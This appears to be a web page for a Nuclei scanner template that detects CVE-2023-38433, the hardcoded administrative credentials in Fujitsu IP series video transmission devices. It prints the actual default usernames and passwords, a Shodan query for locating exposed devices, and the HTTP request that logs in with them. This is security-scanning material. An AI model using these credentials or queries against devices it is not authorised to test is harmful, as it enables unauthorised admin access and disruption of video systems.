Fujitsu IP Series - Hardcoded Credentials

ID: CVE-2023-38433

Severity: high

Author: AdnaneKhan

Tags: cve2023,cve,fujitsu,ip-series

Description

Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.

YAML Source

id: CVE-2023-38433

info:
  name: Fujitsu IP Series - Hardcoded Credentials
  author: AdnaneKhan
  severity: high
  description: |
    Fujitsu Real-time Video Transmission Gear “IP series” use hard-coded credentials, which may allow a remote unauthenticated attacker to initialize or reboot the products, and as a result, terminate the video transmission. The credentials cannot be changed by the end-user and provide administrative access to the devices.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the device, potentially resulting in further compromise of the network.
  reference:
    - https://www.praetorian.com/blog/fujitsu-ip-series-hard-coded-credentials
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38433
    - https://www.cisa.gov/news-events/ics-advisories/icsa-23-248-01
    - https://www.fujitsu.com/global/products/computing/peripheral/video/download
    - https://jvn.jp/en/jp/JVN95727578
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
    cvss-score: 7.5
    cve-id: CVE-2023-38433
    cwe-id: CWE-798
    epss-score: 0.0031
    epss-percentile: 0.69984
    cpe: cpe:2.3:o:fujitsu:ip-he950e_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: fujitsu
    product: ip-he950e_firmware
    shodan-query:
      - '"Server: thttpd/2.25b 29dec2003" content-length:1133'
      - '"server: thttpd/2.25b 29dec2003" content-length:1133'
    max-req: 1
  tags: cve2023,cve,fujitsu,ip-series

http:
  - raw:
      - |
        GET /b_download/index.html HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - fedish264pro
        - fedish265pro
      password:
        - h264pro@broadsight
        - h265pro@broadsight

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'Field Support'

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100f7afaeafd25f9237ebf3d88be671d6fd04fe6c0baf3ade005d3a52303cec82210220534b773c7835df34c4b71d257b807ee07787f85296e2f452e21bc4a58676af11:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-38433.yaml"

View on Github